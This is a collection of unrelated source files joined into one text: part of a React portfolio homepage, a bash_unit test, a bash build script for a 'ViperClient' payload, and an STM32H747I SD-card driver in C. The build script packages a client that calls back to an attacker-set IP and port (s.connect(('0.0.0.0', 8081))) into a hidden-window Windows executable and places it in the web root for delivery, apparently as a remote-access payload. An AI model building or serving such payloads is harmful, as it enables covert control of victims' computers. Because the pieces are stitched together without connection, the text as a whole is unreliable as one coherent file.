<img src={Portfolio6} alt="theshahriyar" />
<div className="hover-box">
<div className="inner-hover">
<a className="zoom" href="#">
<i className="icon-attachment"></i>
</a>
</div>
</div>
</div>
</div>
</div>
</div>
</section>
{/* End Portfolio Section */}
{/* Start Team Member Section */}
<section
className="pad-t80 pad-b50"
style={{ backgroundColor: "#f3f3f3" }}
>
<div className="container">
<div className="row">
<div className="col-md-12">
<SectionTitle title="Who work for you" />
</div>
</div>
<div className="row">
<div className="col-md-4">
<TeamStyle4
teamImg={TeamImg3}
name="<NAME>"
designation="CEO & Founder"
details="Donec sollicitudin molestie malesua. Praesent sapien massa, convallis a pellentesque nec, egestas non nisi."
/>
</div>
<div className="col-md-4">
<TeamStyle4
teamImg={TeamImg6}
name="<NAME>"
designation="Consultant"
details="Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Donec rutrum congue malesuada. Vestibulum ac diam sit amet quam."
/>
</div>
<div className="col-md-4">
<TeamStyle4
teamImg={TeamImg5}
name="<NAME>"
designation="Manager"
details="Donec sollicitudin molestie malesua. Praesent sapien massa, convallis a pellentesque nec, egestas non nisi."
/>
</div>
</div>
</div>
</section>
{/* End Team Member Section */}
{/* Start Testimonial Section*/}
<section
className="pad80 parallax"
>
<div className="container">
<div className="row">
<div className="col-md-12">
<SectionTitle title="What people say" />
</div>
</div>
<div className="row">
<div className="col-md-12">
<Testimonial/>
</div>
</div>
</div>
</section>
{/* End Testimonial Section*/}
{/* Start Latest News Section*/}
<section
className="pad-t80 pad-b50"
style={{ backgroundColor: "#f9f9f9" }}
>
<div className="container">
<div className="row">
<div className="col-md-12">
<SectionTitle title="Latest News" />
</div>
</div>
<div className="row">
<div className="col-md-4">
<div className="latest-news">
<div className="latest-news-img">
<img src={NewsImg1} alt="blog-post" />
<div>
<span>Aug</span>
<span>06</span>
</div>
</div>
<h4>
<a href="#">
Lorem Ipsum is dummy text of type setting industry.
</a>
</h4>
<p>
Vivamus magna justo, lacinia eget consectetur convallis at
tellus. Lorem ipsum dolor sit consectetur adipiscing elit
</p>
</div>
</div>
<div className="col-md-4">
<div className="latest-news">
<div className="latest-news-img">
<img src={NewsImg3} alt="blog-post" />
<div>
<span>Aug</span>
<span>07</span>
</div>
</div>
<h4>
<a href="#">
Lorem Ipsum is dummy text of type setting industry.
</a>
</h4>
<p>
Vivamus magna justo, lacinia eget consectetur convallis at
tellus. Lorem ipsum dolor sit consectetur adipiscing elit
</p>
</div>
</div>
<div className="col-md-4">
<div className="latest-news">
<div className="latest-news-img">
<img src={NewsImg2} alt="blog-post" />
<div>
<span>Aug</span>
<span>08</span>
</div>
</div>
<h4>
<a href="#">
Lorem Ipsum is dummy text of type setting industry.
</a>
</h4>
<p>
Vivamus magna justo, lacinia eget consectetur convallis at
tellus. Lorem ipsum dolor sit consectetur adipiscing elit
</p>
</div>
</div>
</div>
</div>
</section>
{/* End Latest News Section*/}
{/* Start Client Section*/}
<section className="client-section pad80">
<div className="container">
<div className="row">
<div className="col-md-12">
<SectionTitle title="Our Client's" />
</div>
</div>
<div className="row">
<div className="col-md-12">
<Clients />
</div>
</div>
</div>
</section>
{/* End Client Section*/}
{/* Start Footer Section*/}
<FooterStyle1 />
{/* End Footer Section*/}
</>
)
}
export default Homepage4
|
#!/bin/bash
#/*
# * This file is part of TangoMan Bash Aliases package.
# *
# * Copyright (c) 2021 "Matthias Morin" <mat@tangoman.io>
# *
# * This source file is subject to the MIT license that is bundled
# * with this source code in the file LICENSE.
# */
# https://github.com/pgrange/bash_unit
#
# assert "test -e /tmp/the_file"
# assert_fails "grep this /tmp/the_file" "should not write 'this' in /tmp/the_file"
# assert_status_code 25 code # 127: command not found; 126: command not executable
# assert_equals "a string" "another string" "a string should be another string"
# assert_not_equals "a string" "a string" "a string should be different from another string"
# fake ps echo hello world
# Path to the script under test, relative to this test file.
src_file="../../src/multimedia/picture-list-exif.sh"
# shellcheck source=/dev/null
# Load the script so its functions are available to the assertions below.
. "${src_file}"
# bash_unit test: executing the script should terminate with exit status 0.
test_script_execution_should_return_expected_status_code() {
assert_status_code 0 "${src_file}"
}
|
# Builds payloads/ViperClient.py into a standalone Windows executable
# (ViperClient.exe) with pyinstaller under wine, then copies the result
# to the current directory and the web root for delivery.
echo "Generating ViperClient.exe"
echo ""
echo "read this first"
echo ""
echo "***Important please read before running this script. The payload will not work unless
you change the following line. Make sure that you navigate to payloads/ViperClient.py and change
the IP ADDRESS and PORT number that you want the client to call back to. If you have already changed
the ip address and port number inside ViperClient.py press any key to continue"
echo ""
echo "Important first change this line to your own correct settings
s.connect(('0.0.0.0', 8081)), inside payloads/ViperClient.py"
echo ""
echo ""
echo "Once that line is changed then press any key to continue"
echo ""
echo ""
read -n 1 -s -p "Press any key to continue"
echo "generating ViperClient.exe"
# wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile HelloWorld.py
# Abort if the payload directory is missing instead of running the build
# (and the rm -rf cleanup!) in the wrong directory.
cd payloads/ || exit 1
wine pyinstaller --onefile --noconsole --nowindowed ViperClient.py
rm -rf build/
rm -rf dist/
# Force a windowless build in the generated spec, then rebuild from it.
sed -i 's/console=True/console=False/g' ViperClient.spec
wine pyinstaller ViperClient.spec
cp dist/ViperClient.exe .
cp dist/ViperClient.exe /var/www/html/
rm -rf build/
rm -rf dist/
cd ../
/**
******************************************************************************
* @file stm32h747i_discovery_sd.c
* @author MCD Application Team
* @brief This file includes the uSD card driver mounted on STM32H747I_DISCO
* boards.
@verbatim
How To use this driver:
-----------------------
- This driver is used to drive the micro SD external cards mounted on STM32H747I_DISCO
board.
- This driver does not need a specific component driver for the micro SD device
to be included with.
Driver description:
------------------
+ Initialization steps:
o Initialize the micro SD card using the BSP_SD_Init() function. This
function includes the MSP layer hardware resources initialization and the
SDIO interface configuration to interface with the external micro SD. It
also includes the micro SD initialization sequence.
o To check the SD card presence you can use the function BSP_SD_IsDetected() which
returns the detection status.
o If SD presence detection interrupt mode is desired, you must configure the
SD detection interrupt mode by calling the function BSP_SD_DetectITConfig().
The interrupt is generated as an external interrupt whenever the micro SD card is
plugged/unplugged in/from the evaluation board.
The SD detection is managed by MFX, so the SD detection interrupt has to be
treated by MFX_IRQOUT gpio pin IRQ handler. BSP_SD_DetectCallback() is called when
SD is detected.
o The function BSP_SD_GetCardInfo() is used to get the micro SD card information
which is stored in the structure "HAL_SD_CardInfoTypedef".
+ Micro SD card operations
o The micro SD card can be accessed with read/write block(s) operations once
it is ready for access. The access can be performed whether
using the polling mode by calling the functions BSP_SD_ReadBlocks()/BSP_SD_WriteBlocks(),
using the interrupt mode by calling the functions BSP_SD_ReadBlocks_IT()/BSP_SD_WriteBlocks_IT(),
or by DMA transfer using the functions BSP_SD_ReadBlocks_DMA()/BSP_SD_WriteBlocks_DMA().
o The DMA transfer complete is used with interrupt mode. Once the SD transfer
is complete, the SD interrupt is handled using the function BSP_SDMMC1_IRQHandler()
The DMA Tx/Rx transfer complete are handled using the functions
SD_SDMMC1_DMA_Tx_IRQHandler(), SD_SDMMC1_DMA_Rx_IRQHandler().The corresponding
user callbacks are implemented by the user at application level.
o The SD erase block(s) is performed using the functions BSP_SD_Erase() with specifying
the number of blocks to erase.
o The SD runtime status is returned when calling the function BSP_SD_GetCardState().
@endverbatim
******************************************************************************
* @attention
*
* <h2><center>© Copyright (c) 2018 STMicroelectronics.
* All rights reserved.</center></h2>
*
* This software component is licensed by ST under BSD 3-Clause license,
* the "License"; You may not use this file except in compliance with the
* License. You may obtain a copy of the License at:
* opensource.org/licenses/BSD-3-Clause
*
******************************************************************************
*/
/* Includes ------------------------------------------------------------------*/
#include "stm32h747i_discovery_sd.h"
#include "stm32h747i_discovery_bus.h"
/** @addtogroup BSP
  * @{
  */

/** @addtogroup STM32H747I_DISCO
  * @{
  */

/** @defgroup STM32H747I_DISCO_SD SD
  * @{
  */

/** @defgroup STM32H747I_DISCO_SD_Private_TypesDefinitions Private TypesDefinitions
  * @{
  */
/* Generic EXTI line callback type used for the SD-detect interrupt. */
typedef void (* BSP_EXTI_LineCallback) (void);
/**
  * @}
  */

/** @defgroup STM32H747I_DISCO_SD_Exported_Variables Exported Variables
  * @{
  */
SD_HandleTypeDef hsd_sdmmc[SD_INSTANCES_NBR];
EXTI_HandleTypeDef hsd_exti[SD_INSTANCES_NBR];
/**
  * @}
  */

/** @defgroup STM32H747I_DISCO_SD_Private_Variables Private Variables
  * @{
  */
/* Card-detect GPIO pin, one entry per SD instance. */
static uint32_t PinDetect[SD_INSTANCES_NBR] = {SD_DETECT_PIN};
#if (USE_HAL_SD_REGISTER_CALLBACKS == 1)
/* Tracks whether the Msp callbacks were registered for each instance.
   BUGFIX: this array was previously defined twice in this file (also
   under "Private TypesDefinitions"), which is a C redefinition error
   when USE_HAL_SD_REGISTER_CALLBACKS is enabled; the duplicate was
   removed and the single definition kept here with the other private
   variables. */
static uint32_t IsMspCallbacksValid[SD_INSTANCES_NBR] = {0};
#endif
/**
  * @}
  */

/** @defgroup STM32H747I_DISCO_SD_Private_Functions_Prototypes Private Functions Prototypes
  * @{
  */
static void SD_MspInit(SD_HandleTypeDef *hsd);
static void SD_MspDeInit(SD_HandleTypeDef *hsd);
#if (USE_HAL_SD_REGISTER_CALLBACKS == 1)
static void SD_AbortCallback(SD_HandleTypeDef *hsd);
static void SD_TxCpltCallback(SD_HandleTypeDef *hsd);
static void SD_RxCpltCallback(SD_HandleTypeDef *hsd);
#if (USE_SD_TRANSCEIVER > 0U)
static void SD_DriveTransceiver_1_8V_Callback(FlagStatus status);
#endif
#endif /* (USE_HAL_SD_REGISTER_CALLBACKS == 1) */
static void SD_EXTI_Callback(void);
/**
  * @}
  */

/** @defgroup STM32H747I_DISCO_SD_Exported_Functions Exported Functions
  * @{
  */
/**
  * @brief  Initializes the SD card device.
  * @param  Instance SD Instance
  * @retval BSP status
  */
int32_t BSP_SD_Init(uint32_t Instance)
{
  int32_t ret = BSP_ERROR_NONE;

  if(Instance >= SD_INSTANCES_NBR)
  {
    ret = BSP_ERROR_WRONG_PARAM;
  }
  else
  {
    /* Refuse to initialize when no card is inserted in the slot. */
    if(BSP_SD_IsDetected(Instance) != SD_PRESENT)
    {
      ret = BSP_ERROR_UNKNOWN_COMPONENT;
    }
    else
    {
#if (USE_HAL_SD_REGISTER_CALLBACKS == 1)
      /* Register the SD MSP Callbacks (only once per instance). */
      if(IsMspCallbacksValid[Instance] == 0UL)
      {
        if(BSP_SD_RegisterDefaultMspCallbacks(Instance) != BSP_ERROR_NONE)
        {
          ret = BSP_ERROR_PERIPH_FAILURE;
        }
      }
#else
      /* Msp SD initialization */
      SD_MspInit(&hsd_sdmmc[Instance]);
#endif /* USE_HAL_SD_REGISTER_CALLBACKS */

      if(ret == BSP_ERROR_NONE)
      {
        /* HAL SD initialization and Enable wide operation */
        if(MX_SDMMC1_SD_Init(&hsd_sdmmc[Instance]) != HAL_OK)
        {
          ret = BSP_ERROR_PERIPH_FAILURE;
        }
#if (USE_SD_BUS_WIDE_4B > 0)
        else if(HAL_SD_ConfigWideBusOperation(&hsd_sdmmc[Instance], SDMMC_BUS_WIDE_4B) != HAL_OK)
        {
          ret = BSP_ERROR_PERIPH_FAILURE;
        }
#endif
        else
        {
          /* Switch to High Speed mode if the card support this mode
             (best effort: a failure to switch is deliberately ignored). */
          (void)HAL_SD_ConfigSpeedBusOperation(&hsd_sdmmc[Instance], SDMMC_SPEED_MODE_HIGH);

#if (USE_HAL_SD_REGISTER_CALLBACKS == 1)
          /* Register SD TC, HT and Abort callbacks */
          if(HAL_SD_RegisterCallback(&hsd_sdmmc[Instance], HAL_SD_TX_CPLT_CB_ID, SD_TxCpltCallback) != HAL_OK)
          {
            ret = BSP_ERROR_PERIPH_FAILURE;
          }
          else if(HAL_SD_RegisterCallback(&hsd_sdmmc[Instance], HAL_SD_RX_CPLT_CB_ID, SD_RxCpltCallback) != HAL_OK)
          {
            ret = BSP_ERROR_PERIPH_FAILURE;
          }
          else if(HAL_SD_RegisterCallback(&hsd_sdmmc[Instance], HAL_SD_ABORT_CB_ID, SD_AbortCallback) != HAL_OK)
          {
            ret = BSP_ERROR_PERIPH_FAILURE;
          }
          else
          {
#if (USE_SD_TRANSCEIVER != 0U)
            /* The transceiver callback drives the 1.8V signalling switch. */
            if(HAL_SD_RegisterTransceiverCallback(&hsd_sdmmc[Instance], SD_DriveTransceiver_1_8V_Callback) != HAL_OK)
            {
              ret = BSP_ERROR_PERIPH_FAILURE;
            }
#endif
          }
#endif /* USE_HAL_SD_REGISTER_CALLBACKS */
        }
      }
    }
  }

  return ret;
}
/**
  * @brief  DeInitializes the SD card device.
  * @param  Instance SD Instance
  * @retval SD status
  */
int32_t BSP_SD_DeInit(uint32_t Instance)
{
  if(Instance >= SD_INSTANCES_NBR)
  {
    return BSP_ERROR_WRONG_PARAM;
  }

  /* HAL SD de-initialization */
  if(HAL_SD_DeInit(&hsd_sdmmc[Instance]) != HAL_OK)
  {
    return BSP_ERROR_PERIPH_FAILURE;
  }

#if (USE_HAL_SD_REGISTER_CALLBACKS == 0)
  /* Msp SD de-initialization (registered callbacks handle it otherwise) */
  SD_MspDeInit(&hsd_sdmmc[Instance]);
#endif /* (USE_HAL_SD_REGISTER_CALLBACKS == 0) */

  return BSP_ERROR_NONE;
}
/**
  * @brief  Initializes the SDMMC1 peripheral.
  * @param  hsd SD handle
  * @retval HAL status
  * @note   Declared __weak so the application can override the SDMMC
  *         configuration with its own MX_SDMMC1_SD_Init.
  */
__weak HAL_StatusTypeDef MX_SDMMC1_SD_Init(SD_HandleTypeDef *hsd)
{
  HAL_StatusTypeDef ret = HAL_OK;

  /* uSD device interface configuration */
  hsd->Instance = SDMMC1;
  hsd->Init.ClockEdge = SDMMC_CLOCK_EDGE_RISING;
  hsd->Init.ClockPowerSave = SDMMC_CLOCK_POWER_SAVE_DISABLE;
#if (USE_SD_BUS_WIDE_4B > 0)
  /* 4-bit data bus when wide mode is enabled at build time, else 1-bit. */
  hsd->Init.BusWide = SDMMC_BUS_WIDE_4B;
#else
  hsd->Init.BusWide = SDMMC_BUS_WIDE_1B;
#endif
  hsd->Init.HardwareFlowControl = SDMMC_HARDWARE_FLOW_CONTROL_DISABLE;
#if (USE_SD_TRANSCEIVER >0)
  hsd->Init.TranceiverPresent = SDMMC_TRANSCEIVER_PRESENT;
#endif /*USE_SD_TRANSCEIVER*/
#if ( USE_SD_HIGH_PERFORMANCE > 0 )
  /* Clock divider selection depends on the performance profile. */
  hsd->Init.ClockDiv = SDMMC_HSpeed_CLK_DIV;
#else
  hsd->Init.ClockDiv = SDMMC_NSpeed_CLK_DIV;
#endif /*USE_SD_HIGH_PERFORMANCE*/

  /* HAL SD initialization */
  if(HAL_SD_Init(hsd) != HAL_OK)
  {
    ret = HAL_ERROR;
  }

  return ret;
}
#if (USE_HAL_SD_REGISTER_CALLBACKS == 1)
/**
  * @brief  Default BSP SD Msp Callbacks
  * @param  Instance SD Instance
  * @retval BSP status
  */
int32_t BSP_SD_RegisterDefaultMspCallbacks(uint32_t Instance)
{
  int32_t status = BSP_ERROR_NONE;

  if(Instance >= SD_INSTANCES_NBR)
  {
    status = BSP_ERROR_WRONG_PARAM;
  }
  /* Hook the driver-provided MspInit/MspDeInit into the HAL handle;
     registration stops at the first failure (short-circuit). */
  else if((HAL_SD_RegisterCallback(&hsd_sdmmc[Instance], HAL_SD_MSP_INIT_CB_ID, SD_MspInit) != HAL_OK) ||
          (HAL_SD_RegisterCallback(&hsd_sdmmc[Instance], HAL_SD_MSP_DEINIT_CB_ID, SD_MspDeInit) != HAL_OK))
  {
    status = BSP_ERROR_PERIPH_FAILURE;
  }
  else
  {
    IsMspCallbacksValid[Instance] = 1U;
  }

  /* Return BSP status */
  return status;
}
/**
  * @brief  BSP SD Msp Callback registering
  * @param  Instance  SD Instance
  * @param  CallBacks pointer to MspInit/MspDeInit callbacks functions
  * @retval BSP status
  */
int32_t BSP_SD_RegisterMspCallbacks(uint32_t Instance, BSP_SD_Cb_t *CallBacks)
{
  int32_t status = BSP_ERROR_NONE;

  if(Instance >= SD_INSTANCES_NBR)
  {
    status = BSP_ERROR_WRONG_PARAM;
  }
  /* Hook the application-supplied MspInit/MspDeInit into the HAL handle;
     registration stops at the first failure (short-circuit). */
  else if((HAL_SD_RegisterCallback(&hsd_sdmmc[Instance], HAL_SD_MSP_INIT_CB_ID, CallBacks->pMspInitCb) != HAL_OK) ||
          (HAL_SD_RegisterCallback(&hsd_sdmmc[Instance], HAL_SD_MSP_DEINIT_CB_ID, CallBacks->pMspDeInitCb) != HAL_OK))
  {
    status = BSP_ERROR_PERIPH_FAILURE;
  }
  else
  {
    IsMspCallbacksValid[Instance] = 1U;
  }

  /* Return BSP status */
  return status;
}
#endif /* (USE_HAL_SD_REGISTER_CALLBACKS == 1) */
/**
  * @brief  Configures Interrupt mode for SD detection pin.
  * @param  Instance SD Instance
  * @retval BSP status
  */
int32_t BSP_SD_DetectITConfig(uint32_t Instance)
{
  int32_t ret;
  GPIO_InitTypeDef gpio_init_structure;
  const uint32_t SD_EXTI_LINE[SD_INSTANCES_NBR] = {SD_DETECT_EXTI_LINE};
  static BSP_EXTI_LineCallback SdCallback[SD_INSTANCES_NBR] = {SD_EXTI_Callback};

  /* BUGFIX: was 'Instance > SD_INSTANCES_NBR', which let
     Instance == SD_INSTANCES_NBR index one past the end of the
     per-instance arrays; use '>=' like every other API in this driver. */
  if(Instance >= SD_INSTANCES_NBR)
  {
    ret = BSP_ERROR_WRONG_PARAM;
  }
  else
  {
    /* Configure the detect pin as an interrupt source on both edges
       (card insertion and removal). */
    gpio_init_structure.Pin = PinDetect[Instance];
    gpio_init_structure.Pull = GPIO_PULLUP;
    gpio_init_structure.Speed = GPIO_SPEED_FREQ_HIGH;
    gpio_init_structure.Mode = GPIO_MODE_IT_RISING_FALLING;
    HAL_GPIO_Init(SD_DETECT_GPIO_PORT, &gpio_init_structure);

    /* Enable and set SD detect EXTI Interrupt to the lowest priority */
    HAL_NVIC_SetPriority((IRQn_Type)(SD_DETECT_EXTI_IRQn), 0x0F, 0x00);
    HAL_NVIC_EnableIRQ((IRQn_Type)(SD_DETECT_EXTI_IRQn));

    HAL_EXTI_GetHandle(&hsd_exti[Instance], SD_EXTI_LINE[Instance]);
    if(HAL_EXTI_RegisterCallback(&hsd_exti[Instance], HAL_EXTI_COMMON_CB_ID, SdCallback[Instance]) != HAL_OK)
    {
      ret = BSP_ERROR_PERIPH_FAILURE;
    }
    else
    {
      ret = BSP_ERROR_NONE;
    }
  }

  /* Return BSP status */
  return ret;
}
/**
  * @brief  BSP SD Callback.
  * @param  Instance SD Instance
  * @param  Status   Pin status (SD_PRESENT / SD_NOT_PRESENT)
  * @retval None.
  * @note   Weak no-op by default; override in the application to react
  *         to card insertion/removal events.
  */
__weak void BSP_SD_DetectCallback(uint32_t Instance, uint32_t Status)
{
  /* Prevent unused argument(s) compilation warning */
  UNUSED(Instance);
  UNUSED(Status);

  /* This function should be implemented by the user application.
     It is called into this driver when an event on JoyPin is triggered. */
}
/**
  * @brief  Detects if SD card is correctly plugged in the memory slot or not.
  * @param  Instance SD Instance
  * @retval SD_PRESENT / SD_NOT_PRESENT, or BSP_ERROR_WRONG_PARAM for a
  *         bad instance
  */
int32_t BSP_SD_IsDetected(uint32_t Instance)
{
  int32_t ret;

  if(Instance >= SD_INSTANCES_NBR)
  {
    return BSP_ERROR_WRONG_PARAM;
  }

  /* Check SD card detect pin: the mechanical switch pulls the line low
     when a card is present (pin is pulled up otherwise).
     BUGFIX: the pin was hard-coded to GPIO_PIN_8, ignoring the
     per-instance PinDetect[] table this driver maintains (the original
     even carried the intended expression in a trailing comment). */
  if(HAL_GPIO_ReadPin(SD_DETECT_GPIO_PORT, (uint16_t)PinDetect[Instance]) != GPIO_PIN_RESET)
  {
    ret = (int32_t)SD_NOT_PRESENT;
  }
  else
  {
    ret = (int32_t)SD_PRESENT;
  }

  return ret;
}
/**
  * @brief  Reads block(s) from a specified address in an SD card, in polling mode.
  * @param  Instance  SD Instance
  * @param  pData     Pointer to the buffer that will receive the data
  * @param  BlockIdx  Block index from where data is to be read
  * @param  BlocksNbr Number of SD blocks to read
  * @retval BSP status
  */
int32_t BSP_SD_ReadBlocks(uint32_t Instance, uint32_t *pData, uint32_t BlockIdx, uint32_t BlocksNbr)
{
  /* Scale the per-block timeout by the number of blocks transferred. */
  const uint32_t timeout = SD_READ_TIMEOUT * BlocksNbr;

  if(Instance >= SD_INSTANCES_NBR)
  {
    return BSP_ERROR_WRONG_PARAM;
  }

  if(HAL_SD_ReadBlocks(&hsd_sdmmc[Instance], (uint8_t *)pData, BlockIdx, BlocksNbr, timeout) != HAL_OK)
  {
    return BSP_ERROR_PERIPH_FAILURE;
  }

  return BSP_ERROR_NONE;
}
/**
  * @brief  Writes block(s) to a specified address in an SD card, in polling mode.
  * @param  Instance  SD Instance
  * @param  pData     Pointer to the buffer that contains the data to transmit
  * @param  BlockIdx  Block index from where data is to be written
  * @param  BlocksNbr Number of SD blocks to write
  * @retval BSP status
  */
int32_t BSP_SD_WriteBlocks(uint32_t Instance, uint32_t *pData, uint32_t BlockIdx, uint32_t BlocksNbr)
{
  /* Per-block timeout scaled by the transfer size.
     NOTE(review): reuses SD_READ_TIMEOUT for writes — confirm a dedicated
     write timeout is not required. */
  const uint32_t timeout = SD_READ_TIMEOUT * BlocksNbr;

  if(Instance >= SD_INSTANCES_NBR)
  {
    return BSP_ERROR_WRONG_PARAM;
  }

  if(HAL_SD_WriteBlocks(&hsd_sdmmc[Instance], (uint8_t *)pData, BlockIdx, BlocksNbr, timeout) != HAL_OK)
  {
    return BSP_ERROR_PERIPH_FAILURE;
  }

  return BSP_ERROR_NONE;
}
/**
  * @brief  Reads block(s) from a specified address in an SD card, in DMA mode.
  * @param  Instance  SD Instance
  * @param  pData     Pointer to the buffer that will receive the data
  * @param  BlockIdx  Block index from where data is to be read
  * @param  BlocksNbr Number of SD blocks to read
  * @retval BSP status
  */
int32_t BSP_SD_ReadBlocks_DMA(uint32_t Instance, uint32_t *pData, uint32_t BlockIdx, uint32_t BlocksNbr)
{
  if(Instance >= SD_INSTANCES_NBR)
  {
    return BSP_ERROR_WRONG_PARAM;
  }

  /* Completion is signalled asynchronously via BSP_SD_ReadCpltCallback(). */
  if(HAL_SD_ReadBlocks_DMA(&hsd_sdmmc[Instance], (uint8_t *)pData, BlockIdx, BlocksNbr) != HAL_OK)
  {
    return BSP_ERROR_PERIPH_FAILURE;
  }

  return BSP_ERROR_NONE;
}
/**
  * @brief  Writes block(s) to a specified address in an SD card, in DMA mode.
  * @param  Instance  SD Instance
  * @param  pData     Pointer to the buffer that contains the data to transmit
  * @param  BlockIdx  Block index from where data is to be written
  * @param  BlocksNbr Number of SD blocks to write
  * @retval BSP status
  */
int32_t BSP_SD_WriteBlocks_DMA(uint32_t Instance, uint32_t *pData, uint32_t BlockIdx, uint32_t BlocksNbr)
{
  if(Instance >= SD_INSTANCES_NBR)
  {
    return BSP_ERROR_WRONG_PARAM;
  }

  /* Completion is signalled asynchronously via BSP_SD_WriteCpltCallback(). */
  if(HAL_SD_WriteBlocks_DMA(&hsd_sdmmc[Instance], (uint8_t *)pData, BlockIdx, BlocksNbr) != HAL_OK)
  {
    return BSP_ERROR_PERIPH_FAILURE;
  }

  return BSP_ERROR_NONE;
}
/**
  * @brief  Reads block(s) from a specified address in an SD card, in interrupt mode.
  * @param  Instance  SD Instance
  * @param  pData     Pointer to the buffer that will receive the data
  * @param  BlockIdx  Block index from where data is to be read
  * @param  BlocksNbr Number of SD blocks to read
  * @retval SD status
  * @note   Completion is signalled via BSP_SD_ReadCpltCallback().
  *         (The original @brief said "DMA mode" — copy-paste error.)
  */
int32_t BSP_SD_ReadBlocks_IT(uint32_t Instance, uint32_t *pData, uint32_t BlockIdx, uint32_t BlocksNbr)
{
  int32_t ret = BSP_ERROR_NONE;

  if(Instance >= SD_INSTANCES_NBR)
  {
    ret = BSP_ERROR_WRONG_PARAM;
  }
  else
  {
    if(HAL_SD_ReadBlocks_IT(&hsd_sdmmc[Instance], (uint8_t *)pData, BlockIdx, BlocksNbr) != HAL_OK)
    {
      ret = BSP_ERROR_PERIPH_FAILURE;
    }
  }

  /* Return BSP status */
  return ret;
}
/**
  * @brief  Writes block(s) to a specified address in an SD card, in interrupt mode.
  * @param  Instance  SD Instance
  * @param  pData     Pointer to the buffer that contains the data to transmit
  * @param  BlockIdx  Block index from where data is to be written
  * @param  BlocksNbr Number of SD blocks to write
  * @retval SD status
  * @note   Completion is signalled via BSP_SD_WriteCpltCallback().
  *         (The original @brief said "DMA mode" — copy-paste error.)
  */
int32_t BSP_SD_WriteBlocks_IT(uint32_t Instance, uint32_t *pData, uint32_t BlockIdx, uint32_t BlocksNbr)
{
  int32_t ret = BSP_ERROR_NONE;

  if(Instance >= SD_INSTANCES_NBR)
  {
    ret = BSP_ERROR_WRONG_PARAM;
  }
  else
  {
    if(HAL_SD_WriteBlocks_IT(&hsd_sdmmc[Instance], (uint8_t *)pData, BlockIdx, BlocksNbr) != HAL_OK)
    {
      ret = BSP_ERROR_PERIPH_FAILURE;
    }
  }

  /* Return BSP status */
  return ret;
}
/**
  * @brief  Erases the specified memory area of the given SD card.
  * @param  Instance  SD Instance
  * @param  BlockIdx  First block index to erase
  * @param  BlocksNbr Number of SD blocks to erase
  * @retval SD status
  */
int32_t BSP_SD_Erase(uint32_t Instance, uint32_t BlockIdx, uint32_t BlocksNbr)
{
  if(Instance >= SD_INSTANCES_NBR)
  {
    return BSP_ERROR_WRONG_PARAM;
  }

  /* HAL_SD_Erase takes a start/end block pair derived from the count. */
  if(HAL_SD_Erase(&hsd_sdmmc[Instance], BlockIdx, BlockIdx + BlocksNbr) != HAL_OK)
  {
    return BSP_ERROR_PERIPH_FAILURE;
  }

  return BSP_ERROR_NONE;
}
/**
  * @brief  Gets the current SD card data status.
  * @param  Instance SD Instance
  * @retval Data transfer state.
  *          This value can be one of the following values:
  *            @arg  SD_TRANSFER_OK: No data transfer is acting
  *            @arg  SD_TRANSFER_BUSY: Data transfer is acting
  * @note   NOTE(review): unlike the other APIs in this driver, Instance
  *         is not range-checked here — callers must pass a valid index.
  */
int32_t BSP_SD_GetCardState(uint32_t Instance)
{
  /* Any HAL state other than TRANSFER is reported as busy. */
  return (int32_t)((HAL_SD_GetCardState(&hsd_sdmmc[Instance]) == HAL_SD_CARD_TRANSFER ) ? SD_TRANSFER_OK : SD_TRANSFER_BUSY);
}
/**
  * @brief  Get SD information about specific SD card.
  * @param  Instance SD Instance
  * @param  CardInfo Pointer to HAL_SD_CardInfoTypedef structure
  * @retval BSP status
  */
int32_t BSP_SD_GetCardInfo(uint32_t Instance, BSP_SD_CardInfo *CardInfo)
{
  if(Instance >= SD_INSTANCES_NBR)
  {
    return BSP_ERROR_WRONG_PARAM;
  }

  if(HAL_SD_GetCardInfo(&hsd_sdmmc[Instance], CardInfo) != HAL_OK)
  {
    return BSP_ERROR_PERIPH_FAILURE;
  }

  return BSP_ERROR_NONE;
}
#if !defined (USE_HAL_SD_REGISTER_CALLBACKS) || (USE_HAL_SD_REGISTER_CALLBACKS == 0)
/**
  * @brief SD Abort callbacks
  * @param hsd  SD handle
  * @retval None
  */
void HAL_SD_AbortCallback(SD_HandleTypeDef *hsd)
{
  /* Map the HAL handle back to its BSP instance index (0 or 1). */
  BSP_SD_AbortCallback((hsd == &hsd_sdmmc[0]) ? 0UL : 1UL);
}
/**
  * @brief Tx Transfer completed callbacks
  * @param hsd  SD handle
  * @retval None
  */
void HAL_SD_TxCpltCallback(SD_HandleTypeDef *hsd)
{
  /* Map the HAL handle back to its BSP instance index (0 or 1). */
  BSP_SD_WriteCpltCallback((hsd == &hsd_sdmmc[0]) ? 0UL : 1UL);
}
/**
  * @brief Rx Transfer completed callbacks
  * @param hsd  SD handle
  * @retval None
  */
void HAL_SD_RxCpltCallback(SD_HandleTypeDef *hsd)
{
  /* Map the HAL handle back to its BSP instance index (0 or 1). */
  BSP_SD_ReadCpltCallback((hsd == &hsd_sdmmc[0]) ? 0UL : 1UL);
}
#if (USE_SD_TRANSCEIVER != 0U)
/**
  * @brief  Enable the SD Transceiver 1.8V Mode Callback.
  * @note   The spelling "Transciver" matches the weak HAL symbol being
  *         overridden — do not "fix" it, or the override silently stops
  *         taking effect.
  */
void HAL_SD_DriveTransciver_1_8V_Callback(FlagStatus status)
{
#if (USE_BSP_IO_CLASS > 0U)
  /* Drive the LDO-select IO according to the requested signalling mode
     (SET -> IO_PIN_SET; presumably selects 1.8V — confirm with schematic). */
  if(status == SET)
  {
    BSP_IO_WritePin(0, SD_LDO_SEL_PIN, IO_PIN_SET);
  }
  else
  {
    BSP_IO_WritePin(0, SD_LDO_SEL_PIN, IO_PIN_RESET);
  }
#endif
}
#endif
#endif /* !defined (USE_HAL_SD_REGISTER_CALLBACKS) || (USE_HAL_SD_REGISTER_CALLBACKS == 0) */
/**
  * @brief  This function handles pin detection interrupt request.
  * @param  Instance SD Instance
  * @retval None
  * @note   To be called from the EXTI IRQ handler for the detect line;
  *         dispatches to SD_EXTI_Callback via the EXTI handle.
  */
void BSP_SD_DETECT_IRQHandler(uint32_t Instance)
{
  HAL_EXTI_IRQHandler(&hsd_exti[Instance]);
}
/**
  * @brief  This function handles SDMMC interrupt requests.
  * @param  Instance SD Instance
  * @retval None
  * @note   To be called from the SDMMC IRQ handler; the HAL in turn
  *         invokes the registered Tx/Rx/Abort completion callbacks.
  */
void BSP_SD_IRQHandler(uint32_t Instance)
{
  HAL_SD_IRQHandler(&hsd_sdmmc[Instance]);
}
/**
  * @brief  BSP SD Abort callbacks
